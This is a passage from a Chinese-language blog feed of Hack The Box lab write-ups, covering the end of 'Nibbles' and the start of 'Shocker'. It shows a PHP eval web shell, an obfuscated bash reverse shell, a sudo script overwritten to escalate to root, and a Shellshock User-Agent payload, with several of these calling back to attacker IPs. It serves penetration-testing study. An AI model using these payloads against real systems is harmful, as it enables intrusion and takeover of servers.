/post/hackbox/nibbles/image/image_2-n_AHFanj_hu3d6e1b28669eae8fa19f8ef3f0aca56f_32590_09a8202188804963117bd7eb6c6a641f.webp 760w,
/post/hackbox/nibbles/image/image_2-n_AHFanj_hu3d6e1b28669eae8fa19f8ef3f0aca56f_32590_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_2-n_AHFanj_hu3d6e1b28669eae8fa19f8ef3f0aca56f_32590_4f7083127504620eaf1f97b70a7ab7bf.webp"
width="655"
height="395"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>Nibbleblog&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_7sMftttgTh_hu8ee37c885b31e683427a071d492d279e_68343_962234dfb28ce40e07f82c137e948c58.webp 400w,
/post/hackbox/nibbles/image/image_7sMftttgTh_hu8ee37c885b31e683427a071d492d279e_68343_bb3a22e0404f4bdb3934fb095aa37a0d.webp 760w,
/post/hackbox/nibbles/image/image_7sMftttgTh_hu8ee37c885b31e683427a071d492d279e_68343_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_7sMftttgTh_hu8ee37c885b31e683427a071d492d279e_68343_962234dfb28ce40e07f82c137e948c58.webp"
width="1118"
height="695"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">https://seclists.org/search.html?q&lt;span class="o">=&lt;/span>NibbleBlog
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>4.0.3存在代码执行，但是不知道靶机是什么版本&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_iLL-NEXKkt_hu676914606d97d120402f9241e72018ae_79374_b90b92148a4a0177cc44b05c47347e48.webp 400w,
/post/hackbox/nibbles/image/image_iLL-NEXKkt_hu676914606d97d120402f9241e72018ae_79374_19ccf5f1520b0612a32fcb55c70a6295.webp 760w,
/post/hackbox/nibbles/image/image_iLL-NEXKkt_hu676914606d97d120402f9241e72018ae_79374_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_iLL-NEXKkt_hu676914606d97d120402f9241e72018ae_79374_b90b92148a4a0177cc44b05c47347e48.webp"
width="988"
height="525"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">https://seclists.org/fulldisclosure/2015/Sep/5
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_Dn_MTm0_N4_hue1f0dd4bc90c3dd2357ba06ea715883e_58265_20a8691db1a9c62aadf60f7b0d8273c5.webp 400w,
/post/hackbox/nibbles/image/image_Dn_MTm0_N4_hue1f0dd4bc90c3dd2357ba06ea715883e_58265_4b79426de0e3145b82f360cc3ae57665.webp 760w,
/post/hackbox/nibbles/image/image_Dn_MTm0_N4_hue1f0dd4bc90c3dd2357ba06ea715883e_58265_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_Dn_MTm0_N4_hue1f0dd4bc90c3dd2357ba06ea715883e_58265_20a8691db1a9c62aadf60f7b0d8273c5.webp"
width="908"
height="731"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>根据描述是需要先登录的。&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_mRXR5SsLxM_hue2d068abfec65d16bbc73b914f4d3df0_44204_4fcc3c920a2716e2cbbb2f15f14437c0.webp 400w,
/post/hackbox/nibbles/image/image_mRXR5SsLxM_hue2d068abfec65d16bbc73b914f4d3df0_44204_deca942b3710306cc7f18a01a2844d7e.webp 760w,
/post/hackbox/nibbles/image/image_mRXR5SsLxM_hue2d068abfec65d16bbc73b914f4d3df0_44204_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_mRXR5SsLxM_hue2d068abfec65d16bbc73b914f4d3df0_44204_4fcc3c920a2716e2cbbb2f15f14437c0.webp"
width="982"
height="507"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>弱口令,密码就是题目名称小写。&lt;/p>
&lt;p>admin/nibbles&lt;/p>
&lt;p>找到上传图片的位置，安装插件&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_Pi6Fa77ArJ_hu1d669c67dc91cf07764038ebdfc9b1a0_105191_962c1aa3908b025218f4e3070abbfd33.webp 400w,
/post/hackbox/nibbles/image/image_Pi6Fa77ArJ_hu1d669c67dc91cf07764038ebdfc9b1a0_105191_5285bbb30d14445cdaf42e528f1aa8f7.webp 760w,
/post/hackbox/nibbles/image/image_Pi6Fa77ArJ_hu1d669c67dc91cf07764038ebdfc9b1a0_105191_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_Pi6Fa77ArJ_hu1d669c67dc91cf07764038ebdfc9b1a0_105191_962c1aa3908b025218f4e3070abbfd33.webp"
width="1133"
height="739"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>上传shell.php&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-php" data-lang="php">&lt;span class="line">&lt;span class="cl">&lt;span class="o">&amp;lt;?&lt;/span>&lt;span class="nx">php&lt;/span> &lt;span class="o">@&lt;/span>&lt;span class="k">eval&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$_POST&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;shell&amp;#39;&lt;/span>&lt;span class="p">]);&lt;/span>&lt;span class="cp">?&amp;gt;&lt;/span>&lt;span class="err">
&lt;/span>&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_DaOAYYB7wc_huffb65d07aee236c9d677d17d9e944a8f_61890_c67b5383a36f2fdd7b0bbe60d565eb9b.webp 400w,
/post/hackbox/nibbles/image/image_DaOAYYB7wc_huffb65d07aee236c9d677d17d9e944a8f_61890_3a923c2567f8dd1f948b2667f48167f1.webp 760w,
/post/hackbox/nibbles/image/image_DaOAYYB7wc_huffb65d07aee236c9d677d17d9e944a8f_61890_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_DaOAYYB7wc_huffb65d07aee236c9d677d17d9e944a8f_61890_c67b5383a36f2fdd7b0bbe60d565eb9b.webp"
width="1104"
height="463"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>报错，但是文件上传成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_Ml1fWjtQdb_hu8a1f861fba98a79d2277e44c873edb60_127923_576fe3bca6c4efb2af03fc96b2784f7c.webp 400w,
/post/hackbox/nibbles/image/image_Ml1fWjtQdb_hu8a1f861fba98a79d2277e44c873edb60_127923_1e2d7b47bfddd8049105b9e7652842a2.webp 760w,
/post/hackbox/nibbles/image/image_Ml1fWjtQdb_hu8a1f861fba98a79d2277e44c873edb60_127923_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_Ml1fWjtQdb_hu8a1f861fba98a79d2277e44c873edb60_127923_576fe3bca6c4efb2af03fc96b2784f7c.webp"
width="1115"
height="694"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>上传文件的位置，文件被重命名，但是后缀没变&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.75/nibbleblog/content/private/plugins/my_image/
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_YC2fT6dlNr_hu31e929dfcdec5d331bbf7c57eb84315b_70628_a7087b7261912a004f0f05b6f44bd823.webp 400w,
/post/hackbox/nibbles/image/image_YC2fT6dlNr_hu31e929dfcdec5d331bbf7c57eb84315b_70628_fa0b14f0332d4ebf9604ea7dcbdf8d24.webp 760w,
/post/hackbox/nibbles/image/image_YC2fT6dlNr_hu31e929dfcdec5d331bbf7c57eb84315b_70628_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_YC2fT6dlNr_hu31e929dfcdec5d331bbf7c57eb84315b_70628_a7087b7261912a004f0f05b6f44bd823.webp"
width="899"
height="386"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>执行命令成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_gYjOOUsXEn_hue5346cffa04d7898bb9d2094f40a5959_87004_1710e63b69f1f2cba1da428ce18a049a.webp 400w,
/post/hackbox/nibbles/image/image_gYjOOUsXEn_hue5346cffa04d7898bb9d2094f40a5959_87004_93ce6e97c8257424db3ec77f6c7ee6e1.webp 760w,
/post/hackbox/nibbles/image/image_gYjOOUsXEn_hue5346cffa04d7898bb9d2094f40a5959_87004_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_gYjOOUsXEn_hue5346cffa04d7898bb9d2094f40a5959_87004_1710e63b69f1f2cba1da428ce18a049a.webp"
width="1153"
height="492"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>反弹shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">system&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;bash+-c+&amp;#39;{echo,YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNi4yLzIzMzMzIDA%2bJjE%3d}|{base64,-d}|{bash,-i}&amp;#39;&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#decode&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">bash -i &amp;gt;&lt;span class="p">&amp;amp;&lt;/span> /dev/tcp/10.10.16.2/23333 0&amp;gt;&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="m">1&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_hD2p6yT1Pn_hu27de087b83e04a55fb83bcecd85f25a1_179509_581f9ff93c7f8fd45e6a397c03785e6b.webp 400w,
/post/hackbox/nibbles/image/image_hD2p6yT1Pn_hu27de087b83e04a55fb83bcecd85f25a1_179509_4bebe07224a4729f8d54ff863e5d1f48.webp 760w,
/post/hackbox/nibbles/image/image_hD2p6yT1Pn_hu27de087b83e04a55fb83bcecd85f25a1_179509_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_hD2p6yT1Pn_hu27de087b83e04a55fb83bcecd85f25a1_179509_581f9ff93c7f8fd45e6a397c03785e6b.webp"
width="1395"
height="639"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>也可以直接用蚁剑工具&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_Cjz_iEd-uu_hua4cb48c2f6d921859e8544cb7b075c11_99765_f8ada30cab917a6ae4ce638788d58127.webp 400w,
/post/hackbox/nibbles/image/image_Cjz_iEd-uu_hua4cb48c2f6d921859e8544cb7b075c11_99765_2f356f4ee3b6fcae2f3fb9ead9a31642.webp 760w,
/post/hackbox/nibbles/image/image_Cjz_iEd-uu_hua4cb48c2f6d921859e8544cb7b075c11_99765_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_Cjz_iEd-uu_hua4cb48c2f6d921859e8544cb7b075c11_99765_f8ada30cab917a6ae4ce638788d58127.webp"
width="1041"
height="729"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_1uGa1pjk7C_hu0f77ea3d54a21829e41bc9f0b101452e_105402_71d1fdc9a96abaf3414168a29ac85bad.webp 400w,
/post/hackbox/nibbles/image/image_1uGa1pjk7C_hu0f77ea3d54a21829e41bc9f0b101452e_105402_722b97498041109ab64143d1ea1c4ce8.webp 760w,
/post/hackbox/nibbles/image/image_1uGa1pjk7C_hu0f77ea3d54a21829e41bc9f0b101452e_105402_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_1uGa1pjk7C_hu0f77ea3d54a21829e41bc9f0b101452e_105402_71d1fdc9a96abaf3414168a29ac85bad.webp"
width="1185"
height="481"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-php" data-lang="php">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#whoami 当前用户
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#id 当前用户权限
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#sudo -l 查看有root权限的程序
&lt;/span>&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>提权&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_g9rYrfTk5y_hu405e3ba5b39dd478a267629da3e0f654_71571_04d47affebd7dc330f60d68dbddf23d4.webp 400w,
/post/hackbox/nibbles/image/image_g9rYrfTk5y_hu405e3ba5b39dd478a267629da3e0f654_71571_a45ba1f4e8737aa4692b20c6f24ed90c.webp 760w,
/post/hackbox/nibbles/image/image_g9rYrfTk5y_hu405e3ba5b39dd478a267629da3e0f654_71571_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_g9rYrfTk5y_hu405e3ba5b39dd478a267629da3e0f654_71571_04d47affebd7dc330f60d68dbddf23d4.webp"
width="969"
height="186"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现 /home/nibbler下有个压缩包，解压&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_KMMZdTA5P-_hu053a6dc4c95be6b4fb5cac1061b9aa36_67534_21c677d926419f42bd1e4d3e54829f14.webp 400w,
/post/hackbox/nibbles/image/image_KMMZdTA5P-_hu053a6dc4c95be6b4fb5cac1061b9aa36_67534_48a9f88a87409cb98b407c218e8d78b3.webp 760w,
/post/hackbox/nibbles/image/image_KMMZdTA5P-_hu053a6dc4c95be6b4fb5cac1061b9aa36_67534_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_KMMZdTA5P-_hu053a6dc4c95be6b4fb5cac1061b9aa36_67534_21c677d926419f42bd1e4d3e54829f14.webp"
width="535"
height="244"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>直接覆盖monitor.sh的内容&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> &lt;span class="s1">&amp;#39;bash -c &amp;#34;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.16.2/24444 0&amp;gt;&amp;amp;1&amp;#34;&amp;#39;&lt;/span>&amp;gt;monitor.sh
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行脚本&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo ./monitor.sh
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>获得root权限&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nibbles/image/image_tWDcOvXXSL_hu118017db8e4bd0f4b8b75500198c460a_20944_d8abc614f7fa5fd07cc603be93966d85.webp 400w,
/post/hackbox/nibbles/image/image_tWDcOvXXSL_hu118017db8e4bd0f4b8b75500198c460a_20944_cfa278fc814938537a03d7cd5f4f2968.webp 760w,
/post/hackbox/nibbles/image/image_tWDcOvXXSL_hu118017db8e4bd0f4b8b75500198c460a_20944_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nibbles/image/image_tWDcOvXXSL_hu118017db8e4bd0f4b8b75500198c460a_20944_d8abc614f7fa5fd07cc603be93966d85.webp"
width="660"
height="206"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Shocker</title><link>https://docs.kaiasec.tk/post/hackbox/shocker/</link><pubDate>Sun, 24 Apr 2022 14:09:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/shocker/</guid><description>&lt;h3 id="nmap扫描">nmap扫描&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -Pn 10.10.10.56
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_1eplrCsQh9_hu85201880086b6da55dff1cf667d6bcad_65173_6f9c2f13b44749e6c369b10d7e158fb8.webp 400w,
/post/hackbox/shocker/image/image_1eplrCsQh9_hu85201880086b6da55dff1cf667d6bcad_65173_796cd6143310ce478ae84bdba60117d2.webp 760w,
/post/hackbox/shocker/image/image_1eplrCsQh9_hu85201880086b6da55dff1cf667d6bcad_65173_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_1eplrCsQh9_hu85201880086b6da55dff1cf667d6bcad_65173_6f9c2f13b44749e6c369b10d7e158fb8.webp"
width="664"
height="193"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>扫描发现开放80，2222&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_yE7cvIoZ4q_hu3b4e7be18eed1345e604086eb397264b_105025_93f0f6df7c35e0baa3c9fb96155fc65c.webp 400w,
/post/hackbox/shocker/image/image_yE7cvIoZ4q_hu3b4e7be18eed1345e604086eb397264b_105025_058987271ee375289dc77b68f81acbaf.webp 760w,
/post/hackbox/shocker/image/image_yE7cvIoZ4q_hu3b4e7be18eed1345e604086eb397264b_105025_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_yE7cvIoZ4q_hu3b4e7be18eed1345e604086eb397264b_105025_93f0f6df7c35e0baa3c9fb96155fc65c.webp"
width="623"
height="510"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="扫描路径">扫描路径&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ffuf -u &lt;span class="s2">&amp;#34;http://10.10.10.56/FUZZ&amp;#34;&lt;/span> -w /usr/share/dirb/wordlists/common.txt -t &lt;span class="m">50&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#FUZZ是关键字&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">-u url
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">-t 线程数
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">-w 字典路径
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#github&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">https://github.com/ffuf/ffuf
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>扫描到 &lt;code>cgi-bin&lt;/code> 目录&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_MGVe7pLjhp_hue37acef6ef1832f315e1480aa8bd8e8b_201233_eb88510a158dba6677ed7b299e74e420.webp 400w,
/post/hackbox/shocker/image/image_MGVe7pLjhp_hue37acef6ef1832f315e1480aa8bd8e8b_201233_dfada7dd66121f494a7325d074fd1281.webp 760w,
/post/hackbox/shocker/image/image_MGVe7pLjhp_hue37acef6ef1832f315e1480aa8bd8e8b_201233_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_MGVe7pLjhp_hue37acef6ef1832f315e1480aa8bd8e8b_201233_eb88510a158dba6677ed7b299e74e420.webp"
width="932"
height="714"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>换个字典，对cgi-bin继续fuzz&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_zmQgCs2fT9_hu53594b30b0b3800e3acde223d194f332_156048_3f1ab2e04204ab58da58813a1ac601cc.webp 400w,
/post/hackbox/shocker/image/image_zmQgCs2fT9_hu53594b30b0b3800e3acde223d194f332_156048_ddd5b16e5268c0ee1c5d5585fa2facaf.webp 760w,
/post/hackbox/shocker/image/image_zmQgCs2fT9_hu53594b30b0b3800e3acde223d194f332_156048_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_zmQgCs2fT9_hu53594b30b0b3800e3acde223d194f332_156048_3f1ab2e04204ab58da58813a1ac601cc.webp"
width="962"
height="562"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>什么也没扫到，后面看答案发现这个路径下有个 user.sh，我的路径字典没有。&lt;/p>
&lt;p>查看&lt;code>user.sh&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_knNfyNcXyL_hu4e8f78c9329f42b48c2d4123dff780cf_76428_bd183b1a8c6b90b5d4ad3b357fe9deac.webp 400w,
/post/hackbox/shocker/image/image_knNfyNcXyL_hu4e8f78c9329f42b48c2d4123dff780cf_76428_6a217917477ecc925ccaced85aa46ffd.webp 760w,
/post/hackbox/shocker/image/image_knNfyNcXyL_hu4e8f78c9329f42b48c2d4123dff780cf_76428_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_knNfyNcXyL_hu4e8f78c9329f42b48c2d4123dff780cf_76428_bd183b1a8c6b90b5d4ad3b357fe9deac.webp"
width="1248"
height="490"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>根据经验，发现这里存在 Bash Shellshock注入漏洞&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">漏洞英文名称 Bash Shellshock
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">中文命名 破壳（X-CERT）
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">威胁响应等级 A级
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">漏洞相关CVE编号 CVE-2014-6271
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">漏洞发现者 Stéphane Chazelas（法国）
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">漏洞发现事件 2014年9月中旬
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">漏洞公布时间 9月25日
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">漏洞影响对象 bash 1.14至bash 4.3的Linux/Unix系统
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>漏洞详情&lt;/p>
&lt;p>&lt;a href="https://wooyun.js.org/drops/Shellshock%e6%bc%8f%e6%b4%9e%e5%9b%9e%e9%a1%be%e4%b8%8e%e5%88%86%e6%9e%90%e6%b5%8b%e8%af%95.html" title="https://wooyun.js.org/drops/Shellshock漏洞回顾与分析测试.html" target="_blank" rel="noopener">https://wooyun.js.org/drops/Shellshock漏洞回顾与分析测试.html&lt;/a>&lt;/p>
&lt;p>&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271" title="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271" target="_blank" rel="noopener">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271&lt;/a>&lt;/p>
&lt;h3 id="漏洞利用">漏洞利用：&lt;/h3>
&lt;p>反弹shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">GET /cgi-bin/user.sh HTTP/1.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host: 10.10.10.56
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">User-Agent: &lt;span class="o">()&lt;/span> &lt;span class="o">{&lt;/span> :&lt;span class="p">;&lt;/span>&lt;span class="o">}&lt;/span>&lt;span class="p">;&lt;/span>/bin/bash -i &amp;gt;&lt;span class="p">&amp;amp;&lt;/span> /dev/tcp/10.10.14.22/23333 0&amp;gt;&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="m">1&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_a4yVwHB3lY_huae967fdb8ca44532e69422cd3f3b4902_45469_b81860b0ac1b4dc18ad08c9922ea467a.webp 400w,
/post/hackbox/shocker/image/image_a4yVwHB3lY_huae967fdb8ca44532e69422cd3f3b4902_45469_2fa6a32a25f2bd9e0f0dc8117c2a58fe.webp 760w,
/post/hackbox/shocker/image/image_a4yVwHB3lY_huae967fdb8ca44532e69422cd3f3b4902_45469_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_a4yVwHB3lY_huae967fdb8ca44532e69422cd3f3b4902_45469_b81860b0ac1b4dc18ad08c9922ea467a.webp"
width="941"
height="216"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>先拿一个flag&lt;/p>
